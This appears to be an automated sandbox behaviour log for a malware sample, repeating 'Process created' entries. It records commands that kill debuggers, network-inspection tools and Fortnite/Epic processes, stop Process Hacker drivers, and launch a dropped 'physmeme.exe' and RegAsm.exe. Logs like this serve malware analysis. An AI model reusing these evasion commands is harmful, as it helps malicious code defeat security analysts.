Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2084 -s 380	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
